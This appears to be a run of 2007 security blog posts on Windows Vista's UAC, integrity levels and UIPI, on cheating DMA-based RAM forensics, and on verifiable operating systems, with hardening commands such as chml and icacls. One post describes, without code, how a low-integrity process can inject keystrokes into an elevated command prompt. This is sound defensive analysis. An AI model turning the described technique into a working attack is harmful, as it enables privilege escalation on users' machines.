So, today, as far as proactive solutions are considered, we’re left only with solutions #1 and #2, which, as discussed above, can not protect OS and applications from compromises in 100%. And, to make it worse, do not offer any clue, whether the compromise actually occurred.

That’s why I’m trying so much to promote the idea of Verifiable Operating Systems, which should allow to at least find out (in a systematic way) whether the system in question has been compromised or not (but, unfortunately not to find whether the single-shot incident occurred). The point is that the number of required design changes should be fairly small. There are some problems with it too, like e.g. verifying JIT-like code, but hopefully they can be solved in the near feature. Expect me to write more on this topic in the near feature.

Special thanks to Halvar Flake for eye-opening discussions about sound code analyzers and OS security in general.

Monday, March 05, 2007

Handy Tool To Play with Windows Integrity Levels

Mark Minasi wrote to me recently to point out that his new tool, chml, is capable of setting NoReadUp and NoExecuteUp policy on file objects, in addition to the standard NoWriteUp policy, which is used by default on Vista.

As I wrote before the default IL policy used on Vista assumes only the NoWriteUp policy. That means that all objects which do not have assigned any IL explicitly (and consequently are treated as if they were marked with Medium IL) can be read by low integrity processes (only writes are prevented). Also, the standard Windows icacls command, which allows to set IL for file objects, assumes always the NoWriteUp policy only (unless I’m missing some secret switch).

However, it’s possible, for each object, to define not only the integrity level but also the policy which will be used to access it. All this information is stored in the same SACE which also defines the IL.

There doesn’t seem to be too much documentation from Microsoft about how to set those permissions, except this paper about Protected Mode IE and the sddl.h file itself.

Anyway, it’s good to see a tool like chml as it allows to do some cool things in a very simple way. E.g. consider that you have some secret documents in the folder c:\secretes and that you don’t feel like sharing those files with anybody who can exploit your Protected Mode IE. As I pointed out in my previous article, by default all your personal files are accessible to your Protected Mode IE low integrity process, so in the event of successful exploitation the attacker is free to steal them all. However now, using Mark Minasi’s tool, you can just do this:
chml.exe c:\secrets -i:m -nr -nx
This should prevent all the low IL processes, like e.g. Protected Mode IE, from reading the contents of your secret directory.

BTW, you can use chml to also examine the SACE which was created:
chml.exe c:\secrets -showsddl
and you should get something like that as a result:
SDDL string for c:\secrets's integrity label=S:(ML;OICI;NRNX;;;ME)
Where S means that it’s an SACE (in contrast to e.g. DACE), ML says that this ACE defines mandatory label, OICI means “Object Inherit” and “Container Inherit”, NRNX defines that to access this object the NoReadUp and NoExecuteUp policies should be used (which also implies the NoWriteUp BTW) and finally the ME stands for Medium Integrity Level.

All credits go to Mark Minasi and the Windows IL team :)

As a side note: the updated slides for my recent Black Hat DC talk about cheating hardware based memory acquisition can be found here. You can also get the demo movies here.

Tuesday, February 13, 2007

Confusion About The "Joke Post"

It seems that many people didn’t fully understand why I wrote the previous post – Vista Security Model – A Big Joke... There are two things which should be distinguished:

1) The fact that UAC design assumes that every setup executable should be run elevated (and that a user doesn't really have a choice to run it from a non-elevated account),

2) The fact that UAC implementation contains bug(s), like e.g. the bug I pointed out in my article, which allows a low integrity level process to send WM_KEYDOWN messages to a command prompt window running at high integrity level.

I was pissed off not because of #1, but because Microsoft employee - Mark Russinovich - declared that all implementation bugs in UAC are not to be considered as security bugs.

True, I also don't like the fact that UAC forces users to run every setup program with elevated privileges (fact #1), but I can understand such a design decision (as being a compromise between usability and security) and this was not the reason why I wrote "The Joke Post".

Monday, February 12, 2007

Vista Security Model – A Big Joke?

[Update: if you came here from ZDNet or Slashdot - see the post about confusion above!]

Today I saw a new post at Mark Russinovich’s blog which I take as a response to my recent musings about Vista security features, where I pointed out several problems with UAC, like e.g. the attack that allows for a low integrity process to hijack the high integrity level command prompt. Those who read the whole article undoubtedly noticed that my overall opinion of vista security changes was still very positive – after all everybody can do mistakes and the fact UAC is not perfect, doesn’t diminish the fact that it’s a step into the right direction, i.e. implementing least-privilege policy in Windows OS.

However, I now read this post by Mark Russinovich (a Microsoft employee), which says:
"It should be clear then, that neither UAC elevations nor Protected Mode IE define new Windows security boundaries. Microsoft has been communicating this but I want to make sure that the point is clearly heard. Further, as Jim Allchin pointed out in his blog post Security Features vs Convenience, Vista makes tradeoffs between security and convenience, and both UAC and Protected Mode IE have design choices that required paths to be opened in the IL wall for application compatibility and ease of use."

And then we read:
"Because elevations and ILs don’t define a security boundary, potential avenues of attack, regardless of ease or scope, are not security bugs. So if you aren’t guaranteed that your elevated processes aren’t susceptible to compromise by those running at a lower IL, why did Windows Vista go to the trouble of introducing elevations and ILs? To get us to a world where everyone runs as standard user by default and all software is written with that assumption."

Oh, excuse me, is this supposed be a joke? We all remember all those Microsoft’s statements about how serious Microsoft is about security in Vista and how all those new cool security features like UAC or Protected Mode IE will improve the world’s security. And now we hear what? That this flagship security technology (UAC) is in fact… not a security technology!

I understand that implementing UAC, UIPI and Integrity Levels mechanisms on top of the existing Windows OS infrastructure is a hard task and it would be much easier to design the whole new OS from scratch and that Microsoft can’t do this for various of reasons. I understand that all, but that doesn’t mean that once more people at Microsoft realized that too, they should turn everything into a big joke? Or maybe I’m too much of an idealist…

So, I will say this: If Microsoft won’t change their attitude soon, then in a couple of months the security of Vista (from the typical malware’s point of view) will be equal to the security of current XP systems (which means, not too impressive).

Sunday, February 04, 2007

Running Vista Every Day!

More then a month ago I have installed Vista RTM on my primary laptop (x86 machine) and have been running it since that time almost every day. Below are some of my reflections about the new security model introduced in Vista, its limitations, a few flaws and some practical info about how I configured my system.

UAC – The Good and The Bad

User Account Control (UAC) is a new security mechanism introduced in Vista, whose primary goal is to force users to work using restricted accounts, instead working as administrators. This is, in my opinion the most important security mechanism introduced in Vista. That doesn’t mean it can not be bypassed in many ways (due to implementation flaws), but just the fact that such a design change has been made into Windows is, without doubt, a great step towards securing consumer OSes.

When UAC is active (which is a default setting) even when user logs in as an administrator, most of her programs run as restricted processes, i.e. they have only some very limited subset of privileges in their process token. Also, they run at, so called, Medium integrity level, which, among other things, should prevent those applications from interacting with higher integrity level processes via Window messages. This mechanism also got a nice marketing acronym, UIPI, which stands for User Interface Privilege Isolation. Once the system determines that a given program (or a given action) requires administrative privileges, because e.g. the user wants to change system time, it displays a consent window to the user, asking her whether she really wants to proceed. In case the user logged in as a normal user (i.e. the account does not belong to the Administrators group), then the user is also asked to enter password for the one of the administrator's accounts. You can find more background information about UAC, e.g. at this page.

Many people complain about UAC, saying that it’s very annoying for them to see UAC consent dialog box to appear every few minutes or so, and claim that this will discourage users from using this mechanism at all (and yes, there’s an option to disable UAC). I strongly disagree with such opinion - I’ve been running Vista more then a month now and, besides the first few days when I was installing various applications, I now do not see UAC prompt more then 1-2 times per day. So, I really wonder what those people are doing that they see UAC constantly appearing every other minute…

One thing that I found particularly annoying though, is that Vista automatically assumes that all setup programs (application installers) should be run with administrator privileges. So, when you try to run such a program, you get a UAC prompt and you have only two choices: either to agree to run this application as administrator or to disallow running it at all. That means that if you downloaded some freeware Tetris game, you will have to run its installer as administrator, giving it not only full access to all your file system and registry, but also allowing e.g. to load kernel drivers! Why Tetris installer should be allowed to load kernel drivers?

How Vista recognizes installer executables? It has a compatibility database as well as uses several heuristics to do that, e.g. if the file name contains the string “setup” (Really, I’m not kidding!). Finally it looks at the executable’s manifest and most of the modern installers are expected to have such manifest embedded, which may indicate that the executable should be run as administrator.

To get around this problem, e.g. on XP, I would normally just add appropriate permissions to my normal (restricted) user account, in such a way that this account would be ale to add new directories under C:\Program Files and to add new keys under HKLM\Software (in most cases this is just enough), but still would not be able to modify any global files nor registry keys nor, heaven forbid, to load drivers. More paranoid people could chose to create a separate account, called e.g. installer and use it to install most of the applications. Of course, the real life is not that beautiful and you sometimes need to play a bit with regmon to tweak the permissions, but, in general it works for majority of applications and I have been successfully using this approach for years now on my XP box.

That approach would not work on Vista, because every time Vista detects that an executable is a setup program (and believe me Vista is really good at doing this), it will only allow running it as administrator… Even though it’s possible to disable heuristics-based installer detection via local policy settings – see picture below:



that doesn’t seem to work for those installer executables which have embedded manifest saying that they should be run as administrator.

I see the above limitation as a very severe hole in the design of UAC. After all, I would like to be offered a choice whether to fully trust given installer executable (and run it as full administrator) or just allow it to add a folder in C:\Program Files and some keys under HKLM\Software and do nothing more. I could do that under XP, but apparently I can’t under Vista, which is a bit disturbing (unless I’m missing some secret option to change that behavior).

Integrity Levels – Protect the OS but not your data!

Integrity Levels (IL) mechanism has been introduced to help implementing UAC. This mechanism is very simple – every process can be assigned one of the four possible integrity levels:

• Low
• Medium
• High
• System

Similarly, every securable object in the system, like e.g. a directory, file or registry key, can also be assigned an integrity level. Integrity level is nothing else then just an ACE of a special type assigned to the SACL list. If there’s no such ACE at all, then the integrity level of the object is assumed to be Medium. You can use icacls command to see integrity levels on file system objects:
C:\>icacls \Users\joanna\AppData\LocalLow
\Users\joanna\AppData\LocalLow silverose\joanna:(F)
silverose\joanna:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
Mandatory Label\Low Mandatory Level:(OI)(CI)(NW)
BTW, I don’t know any tool/command to see and modify integrity levels assigned to registry keys (I think I know how to do this in C though). Anybody?

Now, the whole concept behind IL is that a process can only get write-access to those objects which have the same or lower integrity level then the process itself.

Update (March 5th, 2007): This is the default behavior of IL and is indicated by the “(NW)” symbol on the picture above, which stands for NoWriteUp policy. I have just learned that one can use the chml tool by Mark Minasi to set also a different policy, i.e. NoReadUp (NR) or NoExecuteUp (NX), which would result that IL mechanism will not allow a lower integrity process to read or execute the objects marked with higher IL. See also my recent post about this tool.

UAC is implemented using IL – even if you log in as administrator, all your processes (like e.g. explorer.exe) run with Medium IL. Once you elevated to the “real admin” your process runs at High IL. System processes, like e.g. services, runs at System IL. From the security point of view High IL seems to be equivalent to System IL, because once you are allowed to execute code at High IL you can compromise the whole system.

Internet Explorer’s protected mode is implemented using the IL mechanism. The iexplore.exe process runs at Low IL and, in a system with default configuration, can only write to %USERPROFILE%\AppData\LocalLow and HKCU\Software\AppDataLow because all other objects have higher ILs (usually Medium).

If you don’t like surfing using IE, you can very easily setup your Firefox (or other browser of your choice) to run as Low integrity process (here we assume that Firefox user’s profile is in j:\config\firefox-profile):
C:\Program Files\Mozilla Firefox>icacls firefox.exe /setintegritylevel low
J:\config>icacls firefox-profile /setintegritylevel (OI)(CI)low
Because firefox.exe is now marked as a Low integrity file, Vista will also create a Low integrity process from this file, unless you are going to start this executable from a High integrity process (e.g. elevated command prompt). Also, if you, for some reason (see below), wanted to use runas or psexec to start a Low integrity process, it won’t work and will start the process as Medium, regardless that the executable is marked as Low integrity.

It should be stressed that IL, by default, protects only against modifications of higher integrity objects. It’s perfectly ok for the Low IL process to read e.g. files, even if they are marked as Medium or High IL. In other words, if somebody exploits IE running in Protected Mode (at Low IL), she will be able to read (i.e. steal) all user’s data.

This is not an implementation bug, this is a design decision and it’s cleverly called the “read-up policy”. If we think about it for a while, it should become clear why Microsoft decided to do it that way. First, we should observe, that what Microsoft is most concerned about, is malware which permanently installs itself in the system and that could later be detected by some anti-malware programs. Microsoft doesn’t like it, because it’s the source of all the complains about how insecure Windows is and also the A/V companies can publish their statistics about how many percent of computers is compromised, etc… All in all, a very uncomfortable situation, not only for Microsoft but also for all those poor users, who now need to try all the various methods (read buy A/V programs) to remove the malware, instead just focus on their work…

On the other hand, imagine a reliable exploit (i.e. not crashing a target too often) which, after exploiting e.g. IE Protected Mode process, steals all the user’s DOC and XLS files, sends them back somewhere and afterwards disappears in an elegant fashion. Our user, busy with his every day work, does not even notice anything, so he can continue working undisturbed and focus on his real job. The A/V programs do not detect the exploit (why should they? – after all there’s no signature for it nor the shellcode uses any suspicious API) so they do not report the machine as infected – because, after all it’s not infected. So, the statistics look better and everybody is generally happier. Including the competition, who now has access to stolen data ;)

User Interface Privilege Isolation and some little Fun

UAC and Integrity Levels mechanism makes it possible for processes running with different ILs to share the same desktop. This raises potential security problem, because Windows implements a mechanism to allow one process to send a “window message”, like e.g. WM_SETTEXT, to another process. Moreover, some messages, like e.g. the infamous WM_TIMER, could be used the redirect execution flow of the target thread. This has been popular a few years ago in so called “Shatter Attacks”.

UIPI, introduced in Vista, is for the rescue. UIPI basically enforces the obvious policy that lower integrity processes can not send messages to higher integrity processes.

Interestingly, UIPI implementation is a bit “unfinished” I would say… For example, in contrast to design assumption, on my system at least, it is possible for the Low integrity process to send e.g. WM_KEYDOWN to e.g. open Administrative shell (cmd.exe) running at High IL and gets arbitrary commands executed.

One simple scenario of the attack is that a malicious program, running at Low IL, can wait for the user to open elevated command prompt – it can e.g. poll the open window handles e.g. every second or so (Window enumeration is allowed even at Low IL). Once it finds the window, it can send commands to execute… Probably not that cool as the recent “Vista Speech Exploit”, but still something to play with ;)

It’s my feeling that there are more holes in UAC, but I will leave finding them all as an exercise for the readers...

Do-It-Yourself: Implementing Privilege Separation

Because of the limitations of the UAC and IL mentioned above (i.e. the read-up policy), I decided to implement a little privilege-separation policy in my system. The first thing we need, is to create a few more accounts, each for a specific type of applications or tasks. E.g. I decided that I want a separate account to run my web browser, a different one for running my email client as well as IM client (which I occasionally run) and a whole other account to deal with my super-secret projects. And, of course, I need a main account, that is, the one which I will use to log in to the system. All in all, here is the list of all the accounts on my Vista laptop:

admin
joanna
joanna.web
joanna.email
joanna.sensitive

So, joanna is used to log into system (this is, BTW, a truly limited account, i.e. it doesn’t belong to the Administrators group) and Explorer and all applications like e.g. Picassa are started using this account. Firefox and Thunderbird run as joanna.web and joanna.email respectively. However, a little trick is needed here, if we want to start those applications as Low IL processes (and we want to do this, because we want UIPI to protect, at least in theory, other applications from web and mail clients if they got compromised somehow). As it was mentioned above, if one uses runas or psexec the created process will run as Medium IL, regardless the integrity level assigned to the executable. We can get around this, buy using this simple trick (note the nested quotations):
runas /user:joanna.web "cmd /c start \"c:\Program Files\Mozilla Firefox\firefox.exe\""
c:\tools\psexec -d -e -u joanna.web -p l33tp4ssw0rd "cmd" "/c start "c:\Program Files\Mozilla Firefox\firefox.exe""
Obviously, we also need to set appropriate ACLs on the directories containing Firefox and Thunderbird user’s profiles, so that each of those two users get full access to the respective directories as well as to a \tmp folder, used to store email attachments and downloaded files. No other personal files should be accessible to joanna.web and joanna.email.

Finally, being a paranoid person as I am, I have also a special user joanna.sensitive, which is the only one granted access to my \projects directory. It may come as a surprise, but I decided to make joanna.sensitve a member of the Administrators group. The reason for that is that I need to make all the applications which run as joanna.sensitve (e.g. gvim, cmd, Visual Studio, KeePass, etc) to have their UI isolated from all other normal applications, which run as joanna at Medium IL. It seems like the only way to start a processes at High IL is to make it part of the Administrators group and then use ‘Run As Administrator’ or runas command to start it.

That way we have the highly dangerous applications, like web browser or email client, run at Low IL and as very limited users (joanna.web and joanna.email), who have access only to the necessary profile directories (the restriction, this time, applies both to read- and write- accesses, because it’s enforced by normal ACLs on file system objects and not by IL mechanism). Then we have all other applications, like Explorer, various Office applications, etc. running as joanna at Medium IL and finally the most critical programs, those running as joanna.sensitve, like KeePass and those which get access to my \projects directory, they all run at High IL.

Thunderbird, GPG and Smart Cards

Even though the above configuration might look good, there’s still a problem with it I haven’t solved yet. The problem is related to mail encryption and how to isolate email client from my PGP private keys. I use Thunderbird together with Enigmail’s OpenPGP extension. The extension is just a wrapper around gpg.exe, a GnuPG implementation of PGP. When I open encrypted email, my Thunderbird processes spawns a new gpg.exe process and passes the passphrase to it as an argument. There are two alarming things here – first Thunderbird process needs to know my passphrase (in fact I enter it into a dialog box displayed by the Enigmail’s extension) and second, the gpg.exe process runs as the same user and at the same IL level as the thunderbird.exe process. So, if thunderbird.exe gets compromised, the malicious code executing inside thunderbird.exe will not only be able to get to know my passphrase, but will also be free to read my private key from disk (because it has the same rights as gpg.exe).

Theoretically it should be possible to solve the problem with passphrase stealing by using GPG Agent, which could run in the background as a service and gpg.exe would ask the agent for the passphrase instead asking thunderbird.exe process, which will never be in possession of the passphrase. Ignoring the fact that there doesn’t seem to be a working GPG Agent implementation for Win32 environment, this still is not a good solution, because thunderbird.exe still gets access to gpg.exe process, which is its own child after all – so it’s possible for thunderbird.exe to read the contents of gpg.exe memory and to find a decrypted PGP private key there.

It would help if GPG was implemented as a service running in the background and thunderbird.exe would only communicate with it using some sort of LPC to send request to encrypt, decrypt, sign and verify buffers. Unfortunately I’m not aware of such implementation, especially for Win32.

The only practical solution seems to be to use a Smart Card, which would perform all the
necessary crypto operations using its own processor. Unfortunately, GnuPG supports only, a so called, OpenPGP smart cards, but it seems that the only two cards which implements this standard (i.e. Fellowship card and the g10 card) implement only 1024 bits RSA keys, which is definitely not enough for even a moderately paranoid person ;)

In the last hope, I turned to commercial PGP, downloaded the trial of PGP Desktop and… it turned out that it doesn’t support Vista yet (what a shame, BTW).

So, for the time being I’m defenseless like a baby against all those mean people who would try to exploit my thunderbird.exe and steal my private PGP key :(

The forgotten part: Detection

One might think that it’s a pretty secure system configuration… Well, more precisely, it could be considered as pretty secure, if UIPI was not buggy and UAC didn’t force me to run random setup programs with full administrator rights and if GPG supported Smart Cards with RSA keys > 1024 (or alternatively PGP Desktop supported Vista). But let’s not be that scrupulous and forgot about those minor problems…

Still, even though that might look like a secure configuration, this is all just an illusion of security! The whole security of the system can be compromised if attacker finds and exploits e.g. a bug in kernel driver.

It should be noted that Microsoft has also implemented several anti-exploitation techniques in Vista, the two most advertised are Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). However, ASLR does not protect against local kernel exploitation, because it’s possible, even for the Low IL process, to query system about the list of loaded kernel modules together with their base addresses (using ZwQuerySystemInformation function). Also, hardware DEP, which works only on 64-bit processors, is not applied to the whole non-paged pool (as well as some other areas, but non-paged pool is the biggest one). In other words, the hardware NX bit is not set on all pages comprising the non-paged pool. BTW, there is a reason for Microsoft doing this and this is not due to compatibility issues (at least I believe so). I wonder who else can guess... ;)

UPDATE (see above): David Solomon, pointed out, that Hardware DEP is also available on many modern 32-bit processors (as the NX bit is implemented in PAE mode).

It’s very good that Microsoft implemented those anti-exploitation technologies (besides ASLR and NX, there are also some others). However the point is, they could be bypassed by a clever attacker under some circumstances. Now think about how many 3rd party kernel drivers are typically present in an average Windows systems – all those graphics card drivers, audio drivers, SATA drivers, A/V drivers, etc... and try answering the question how many possible bugs could be there? (BTW, it should be mentioned that Microsoft did a clever step by moving some classes of kernel drivers into user mode, like e.g. USB drivers – this is called UMDF).

When attacker successfully exploits kernel bug, then all the security scheme implemented by the OS is just worth nothing. So, what can we do? Well, we need to complement all those cool prevention technologies with effective detection technology. But has Microsoft done anything to make systematic detection possible? This is a rhetoric question of course and the negative answer applies unfortunately not only to Microsoft products but also to all other general purpose operating systems I’m aware of :(

My favorite quote of all those people who negate the value of detection is this: “once the system is compromised we can’t do anything!”. BS! Even though it might be true today – because the Operating System are not designed to be verifiable, but that doesn’t mean we can’t change this!

Bottom Line

Microsoft did a good job with securing Vista. They could do better, of course, but remember that Windows is a system for masses and also that they need to take care about compatibility issues, which sometimes can be a real pain. If you want to run Microsoft OS, then I believe that Vista is definitely a better choice then XP from a security standpoint. It has bugs, but which OS doesn't? What I wish for, is that they paid more attention to make their system verifiable...

Acknowledgements

I would like to thank John Lambert and Andrew Roths, both of Microsoft, for answering my questions about UAC design.

Saturday, January 20, 2007

Beyond The CPU: Cheating Hardware Based RAM Forensics


We all know that any software-based system compromise detector can always be cheated if malware runs at the same privilege level as the detector (usually both run in kernel mode). This is what I call Implementation Specific Attacks (ISA). Because of that, mankind has tried to find some better, more reliable ways for analyzing systems, which would not be subject to interference from malware…

And we all know what we’ve come up with as a solution – hardware based devices for obtaining the image of volatile memory (RAM), usually in the form of a PCI card. As far as the PC architecture is concerned, probably the first two papers in this area are those about Tribble and CoPilot. As an alternative to expensive dedicated PCI cards, one can also use a FireWire bus, as it has been described by Maximillian Dornseif at el., and later by Adam Boileau.

The point is: once we get the memory image, we can analyze it for signs of compromises on a trusted machine or we can have the PCI device to do some checks itself (like e.g. CoPilot does).

The whole idea behind hardware based RAM acquisition is that the process of reading the memory is using Direct Memory Access (DMA) to read the physical memory. DMA, as the name suggests, does not involve CPU in the process of accessing memory. So, it seems to be a very reliable way for reading the physical memory…

But it is not! At least in some cases...

Next month, at Black Hat DC, I will be demonstrating how to cheat hardware based memory acquisition on AMD based systems. In other words, I will be showing that the image obtained using DMA, can be made different from the real contents of the physical memory as seen by the CPU. Even though the attack is AMD-specific, it does not rely on virtualization extensions. Also, the attack does not require system reboot. Nor does it require soldering ;)

I have tested my proof-of-concept code against a FireWire-based method of memory acquisition, using tools from Adam Boileau’s presentation.

I wanted to test it also against some PCI cards, but it turned out, that for an ordinary mortal person like myself, it is virtually impossible to buy a sample of a dedicated PCI card for memory acquisition… E.g. the Tribble card is still unavailable for sale, according to its author, even though the prototype has been build in 2003... BBN, the US company known for doing lots of project for the US government, apparently has a prototype (see page 45) of something similar to Tribble, but is not willing to discuss any details with somebody who is not involved in a project with the US government... Finally, Komoku Inc., whose main customers, according to the website, are also US government agencies, also rejected my inquiry for buying a sample of CoPilot, claiming that the device "is not generally available right now" ;)

Anyway, even though I was able to test the attack only against FireWire based method, I’m pretty confident that it will work against all other devices which use DMA to access the physical memory, as the attack itself is very generic.

See you in DC!

Wednesday, January 03, 2007

Towards Verifiable Operating Systems

Last week I gave a presentation at the 23rd Chaos Communication Congress in Berlin. Originally the presentation was supposed to be titled "Stealth malware - can good guys win?", but in the very last moment I decided to redesign it completely and gave it a new title: "Fighting Stealth Malware – Towards Verifiable OSes". You can download it from here.

The presentation first debunks The 4 Myths About Stealth Malware Fighting that surprisingly many people believe in. Then my stealth malware classification is briefly described, presenting the malware of type 0, I and II and challenges with their detection (mainly with type II). Finally I talk about what changes into the OS design are needed to make our systems verifiable. If the OS were designed in such a way, then detection of type I and type II malware would be a trivial task...

There are only four requirements that an OS must satisfy to become easily verifiable, these are:
  1. The underlying processors must support non-executable attribute on a per-page level,

  2. OS design must maintain strong code and data separation on a per-page level (this could be first only in kernel and later might be extended to include sensitive applications),

  3. All code sections should be verifiable on a per-page level (usually this means some signing or hashing scheme implemented),

  4. OS must allow to safely read physical memory by a 3rd party application (kernel driver/module) and for each page allow for reliable determination whether it is executable or not.

The first three requirements are becoming more and more popular these days in various operating systems, as a side effect of introducing anti-exploitation/anti-malware technologies (which is a good thing, BTW). However, the 4th requirement presents a big challenge and it is not clear now whether it would be feasible on some architectures.

Still, I think that it's possible to redesign our systems in order to make them verifiable. If we don't do that, then we will always have to rely on a bunch of "hacks" to check for some known rootktis and we will be taking part in endless arm race with the bad guys. On the other hand, such situation is very convenient for the security vendors, as they can always improve their "Advanced Rootkit Detection Technology" and sell some updates... ;)

Happy New Year!